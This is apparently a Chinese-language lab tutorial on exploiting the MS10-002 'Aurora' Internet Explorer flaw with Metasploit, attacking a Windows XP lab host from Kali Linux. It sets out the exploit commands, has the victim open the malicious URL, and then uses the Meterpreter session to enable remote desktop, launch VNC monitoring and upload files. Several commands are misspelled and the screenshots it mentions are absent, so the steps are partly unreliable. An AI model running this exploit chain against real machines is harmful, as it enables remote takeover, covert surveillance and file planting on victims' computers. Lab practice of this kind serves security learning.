MS10_002漏洞利用
漏洞披露
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2010/ms10-002
漏洞原理
针对Internet Explorer“极光”内存损坏的攻击
也就是IE浏览器漏洞
影响范围:见上方链接
(之前测试过win7,发现win7各个版本的IE都失败了,xp是成功了,建议以xp做靶机)
漏洞利用
攻击方:192.168.216.139(kali linux)
靶机:192.168.216.141(windows xp)
1.使用MSF框架
设置目标靶机ip地址和端口(端口随便填,只要kali上这个端口未被使用即可)
show opitons
set rhost 192.168.216.141
set roprt 1136
run
如果运行后未显示session(如下图所示),就代表失败
如果成功了就像下图
运行后把目标网址复制到xp的IE浏览器上访问即可看到kali有反馈
接着使用sessions -i即可看到目标主机
使用sessions -1使用即可进入到metetpreter
使用ipconfig即可看到目标主机ip
这样xp系统就被控制了
meterpreter板块
除了ipconfig之外,meterpreter还可以使用很多功能
例如打开VNC(监控软件)
首先需要开启靶机远程桌面
run getgui -e
run vnc
等一会就可以弹出VNC界面
或者使用上传或者下载文件(这里上传kali一个文件到xp)
upload kali目标文件路径 xp要放的文件路径
upload /user/123.txt c:/txt
有关meterpreter暂时先说到这里
还有许多例如端口转发,打开问价等都可以试试